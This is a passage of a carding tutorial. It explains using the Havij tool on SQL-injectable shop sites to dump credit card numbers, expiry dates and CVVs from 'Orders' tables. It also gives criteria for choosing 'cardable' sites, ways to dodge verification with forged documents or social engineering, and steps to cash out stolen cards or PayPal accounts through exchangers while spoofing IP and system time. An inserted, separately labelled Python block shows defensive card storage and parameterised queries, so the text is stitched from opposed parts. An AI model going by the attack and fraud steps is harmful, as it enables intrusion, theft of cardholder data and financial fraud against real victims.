Step 3. Once you have set it all, start scanning; the results will be shown as in the screenshot below:

Step 4. Click on Vulnerable to filter the results and only show the vulnerable ones. Bingo! You completed your first task.

GETTING DATA FROM A VULNERABLE SITE:

Now you need to run Havij as administrator and follow the steps below.

Step 1. Paste the vulnerable site into the Target text box in Havij and click Analyze.

Step 2. Once the process has finished, you will see something like the image below in your Havij log box.

Step 3. Click on Tables, then Get Tables, and you will see all the tables that are in the database.


Step 4. Now look for a table named “Orders” or something similar. Tick the table and click on Get Columns.

Step 5. You will get the columns that are in the table “Orders”. Now tick the ones related to credit card information, such as cc_number, cc_type, cc_expired_year, cc_expired_month, and cvv or cvv2. Once you’re done, click on Get Data.

Step 6. Just wait for the dumping progress and you will get the information.

This is how to get free live CCs. If you follow all these steps respectively, I say there is a 99% chance of getting free CCs for carding.
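The dump in Step 5 only yields anything because the site both builds its ?cat= query from the raw parameter and keeps the full card number and CVV in its Orders table. The following added example (not part of the original document) shows the storage and lookup pattern that leaves such a dump empty: the category is passed as a bound parameter, the CVV is never written, and the PAN is replaced by a token plus its last four digits. The schema, sample rows and tokenization key are constructed, and the HMAC-based token stands in for a payment processor’s token vault.

```python
"""Hardened order storage: an 'Orders' table whose dump yields no card data.
Added example, not from the original document; schema, rows and key are constructed."""
import hmac
import hashlib
import sqlite3

# Constructed stand-in for a processor tokenization key; in a real deployment
# the token comes back from the payment gateway and the PAN is never retained.
TOKEN_KEY = b"placeholder-tokenization-key"

def open_store() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    # No cc_number or cvv columns at all: CVV2 must never be stored after
    # authorisation, and the full PAN is replaced by a token plus last four.
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, cat TEXT, name TEXT);
        CREATE TABLE orders (id INTEGER PRIMARY KEY, customer TEXT,
                             pan_last4 TEXT, card_token TEXT,
                             exp_month INTEGER, exp_year INTEGER);
        INSERT INTO products VALUES (1, '1', 'T-shirt'), (2, '2', 'Jacket');
    """)
    return conn

def tokenize(pan: str) -> str:
    """Keyed hash standing in for a vault token; not reversible without the key."""
    return hmac.new(TOKEN_KEY, pan.encode(), hashlib.sha256).hexdigest()

def store_order(conn, customer, pan, cvv, exp_month, exp_year) -> int:
    """Persist an order; the CVV is accepted for the authorisation call only."""
    if not pan.isdigit() or not 12 <= len(pan) <= 19:
        raise ValueError("malformed card number")
    del cvv  # sent to the processor for authorisation, never written to disk
    cur = conn.execute(
        "INSERT INTO orders (customer, pan_last4, card_token, exp_month, exp_year)"
        " VALUES (?, ?, ?, ?, ?)",
        (customer, pan[-4:], tokenize(pan), exp_month, exp_year))
    conn.commit()
    return cur.lastrowid

def products_in_category(conn, cat: str) -> list:
    """Parameterised lookup for the ?cat= parameter the dork above targets."""
    rows = conn.execute("SELECT name FROM products WHERE cat = ?", (cat,))
    return [r[0] for r in rows]

def order_dump_leaks_card_data(conn, pan: str, cvv: str) -> bool:
    """Simulate a full table dump: True only if the PAN or CVV appears in any cell."""
    rows = conn.execute("SELECT * FROM orders").fetchall()
    return any(str(v) in (pan, cvv) for row in rows for v in row)
```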



ARE YOU FINDING A CARDABLE SITE?

What does cardable mean? Basically, a cardable site has the following characteristics, and here is how you determine an easily cardable website:

- You need to look at the site’s TOS/policy to see if they ship to any address and not just the one registered on the card (although you can easily get around this if they don’t, with a COB, photoshopped verification (will go into detail later) or some social engineering over the phone).
- You need to check if they have a Visa verification code or MasterCard SecureCode (most of the time, if you ask your vendor, they’ll include them in your CVV2 details text file); if they do have one of these that you have to put in, and you don’t have them, then don’t waste your time.
- If they ship internationally (for obvious reasons, but you can just stick to local websites and order to your local drop; this is the best).
- If they leave packages at the door when no one’s in, or around the back in a safe area (I know of one site in the UK that has all these qualities including this one; it is perfect for carding clothes).
- Also, you can’t forget to see what other security checks they need to do (if they need to call you up to verify, or want a utility bill, passport, or a scan of the actual CC).

CASHOUT TUTORIAL | PAYPAL – CC – BTC

1. Download and open the Brave browser if you card from a PC, or Firefox for mobile carders.
2. Sign up at bestchange.com.
3. Prepare your CC or PayPal (you should be able to access the account).
4. In the left column head over to the Online Banking section and select Visa/MasterCard USD or EUR or GBP, depending on your card/PayPal.
5. Select your cashout method. You can choose Wire USD, but you will get about 70% of the amount. (Optionally choose BTC or Perfect Money, then withdraw to your local bank or Visa, so you get about 90% of the amount.)
6. In the main section choose the first option, then follow the link.
7. NOW it’s important to copy the link you followed, then open a new tab and paste it where you can change your IP and system time to the CC or PayPal IP.
8. Put in the details and you are ready to go.
9. Wait 10 min to 1 hour and you will receive the money.
